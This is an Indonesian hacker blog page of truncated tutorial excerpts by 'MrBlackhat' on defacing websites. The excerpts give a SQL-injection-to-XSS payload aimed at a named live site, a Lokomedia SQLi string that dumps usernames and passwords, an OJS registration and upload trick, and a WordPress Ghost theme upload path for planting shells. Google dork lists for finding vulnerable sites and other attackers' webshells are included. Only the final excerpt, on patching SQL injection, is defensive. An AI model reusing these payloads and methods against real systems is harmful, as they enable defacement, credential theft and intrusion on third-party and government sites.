KBCI INDONESIA

 Assalamu'alaikum wr wb kali ini saya akan kasih tutorial cara SQL to Xss oke langsung saja ke tutorialnya lanjut:v Bahan: - Hp/PC - internet jelas:v - kopi:v - Target - pacar biar ada semangatin:v Pertama kalian harus punya target terlebih dahulu disini saya sudah ada target http://sahyogtraders.in/ Oke jika sudah dapat target kalian inject dulu seperti sampai muncul angka togel nya jika sudah kalian Hex Dulu payload Xss nya  Pencet di sini kimak:v Jika sudah di Hex payload Xss tinggal kalian salin angkanya seperti ini  3C7363726970743E616C6572743D70726F6D707428646F63756D656E742E646F6D61696E293C2F7363726970743E Oke kalian salin hex Xss nya ke angka togel kalian contoh:.php?=-27%27+union+select+1,0x3C7363726970743E616C6572743D70726F6D707428646F63756D656E742E646F6D61696E293C2F7363726970743E,3,4,5--+- jangan lupa tambahin 0x Oke dan hasilnya seperti di bawah ini Jika masih belum paham? Bisa lihat video di bawah ini dan jangan lupa subscribe dan like jik...

Assalamualaikum wr wb jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara deface poc ojs Oke tanpa basa basi langsung saja Bahan: - dork - internet - HP/laptop - scrip/shell kalian - pacar biar ada semangati:v Dork: -intext:Journal "new submission"            -inurl:/index.php/index/user/register            -intext:about submission "Journal"            -inurl:/index.php/ojs Kembangin lagi sesuai otak kalean xixixi Untuk mengecek web nya vuln atau gak kalian bisa ketik /files di depan contoh: https://kbcii.blogspot.com/files  jika nanti muncul index of berarti vuln. Yang pertama kalian dorking terlebih dahulu di google kesayangan anda Jika sudah kalian Register terlebih dahulu gan isi terserah yang ada tanda * dan isi phone jika sudah kalian centang yang ada tulisan  Author : Able to submit items to the journal Jika sudah kalian sudah registras...

Assalamualaikum jumpa lagi dengan saya MrBlachat kali ini aku akan kasih saya kasih tutorial cara deface SQL LOKOMEDIA Oke langsung saja Bahan - hp/pc - dork - internet pastinya - MD 5Decrypter - pacar biar ada yang semangatin - kopi biar otak fresss Dork:-  inurl:statis-1-pengantar.html             - i nurl:statis-1/profil.html             - inurl:statis-19-beasiswa.html             - inurl:statis-22-kerjasama.html Kembangin lagi gan sesuai otak kalian Exploit: 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Ok langsung saja ke tutorial nya Pertama kalian dorking di google kesayangan anda kayak seperti di bawah ini Jika kalian dah punya target tinggal kalian masukkan exploit nya di atas Contoh: http://nama domain.go.id/statis- 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511...

Assalamualaikum wr.wb jumpa lagi dengan saya MrBlachat kali ini aku akan kasih tutorial cara deface poc Wp-ghost themes+live target Oke langsung saja Bahan: - Dork - scrip html/shell.php kalian - csrf online - pacar biar ada semangatin:v - kopi biar gak terlalu tegang Dork:- inurl:wp-content/themes/Ghost/ Exploit:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php Ok langsung saja ke tutorial nya Pertama kalian masukkan dork di atas ke Google kesayangan anda jika sudah masukan exploit nya contoh: https://nama domain.com/ wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php Jika vuln nanti kayak di gambar di bawah Jika vuln di atas kalian masukan link target kalian ke csrf online dan ingat harus Filedata Jika sudah untuk cara manggil target Contoh: https://Nama target kalian.com/ wp-content/uploads/settingimages/nama shell kalian atau script deface kalian. Nah tinggal mirror deh>_< xixixixi Oke sekian dari tutorial da...

Assalamu'alaikum wr wb Jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara dorking shell tanpa basa basi kita langsung saja ke tutorialnya cekidot Bahan: - HP/laptop - shell/script deface kalian - pacar biar ada semangatin Dork:  intitle:index of wso.php intext:64k intitle:index of lux.php intext:64k intitle:index of mego.php Intex:64k intitle:index of raw.php intext:64k intitle:index of H3IIO.php intext:64k intitle:index of H3IIX.php intext:48k intitle:index of shell.php intext:64k intitle:index of cgi.php intext:64k intitle:index of DrugO.php intext:64k intitle:index of xleet.php intext:48k [New Dork] intitle:index of / cgp.php intitle:index of / pgp.php intitle:index of / shell23.php intitle:index of / semo.php intitle:index of / shell9.php intitle:index of / Cih.php intitle:index of / cp2019.php intitle:index of / ml.php intitle:index of / dr.php intitle:index of / df.php intitle:index of / mst.php intitle:index of / full.ph...

Assalamu'alaikum wr wb Jumpa lagi dengan saya MrBlackhat di blog KBCI INDONESIA mohon maaf jika mimin jarang upload karna malas: v hehehe kali ini saya akan bagi tutorial cara deface metode priv8 SRC metode ini sdh lama. Oke tanpa basa basi langsung saja kita ketutorialnya. Bahan: - HP/PC - dork - pacar biar ada semangatin - kopi biar fokus Dork: - inurl:config/config.izo            - intitle: "Priv8 SRC"            - "priv8 SRC config.izo" Oke langsung ajah Pertama² kalian masukan dork di atas Pilih web yang kalian mau jadiin pcr oke gan: v Jika sudah kalian pilih web yang kalian mau nanti kayak gini Trus kalian isi terserah mau heked by kek apa kek terserah kalian gan. Bang gmn cara manggil nya kalian ganti config.izo dengan tar.tmp http://www.sitelu.gov/config/tar.tmp Dan Boom!!! Oke sekian dari tutorial dari saya jika ada ingin di tanyakan bisa tulis di kolom komentar gan oke mohon maaf jika ...

Assalamu'alaikum selamat datang di KBCII OFFICIAL,  Mohon maaf jika kalau aku jarang upload karena Adminnya lagi sibuk mendalami SQL INJECTION oke kesempatan kali ini gua akan kasih nih cara menutup Bug SQL INJECTION.  Cara Patch Bug SQLi - SQL Injection (SQLi)  adalah jenis serangan dimana perintah SQL disuntikkan ke input data atau semacamnya untuk memengaruhi perintah SQL yang telah ditetapkan. Serangan ini digunakan atacker untuk mendapatkan akses langsung ke database. Dan dengan demikian sang attacker bisa membaca data sensitif, hingga memodifikasi database (masukkan, perbarui, hapus). Celah Sqli ini bisa dibilang celah aplikasi web tertua, paling umum, tapi sangat berbahaya. Patch SQL Injection Sebagian besar aplikasi dan situs web modern menggunakan bentuk konten yang dinamis. Konten tersebut bisa dalam bentuk artikel, buku tamu, gallery, detail produk, halaman login, dll. Dengan demikian dalam scriptingnya pasti melibatkan database sebagai penyimpan data konten di...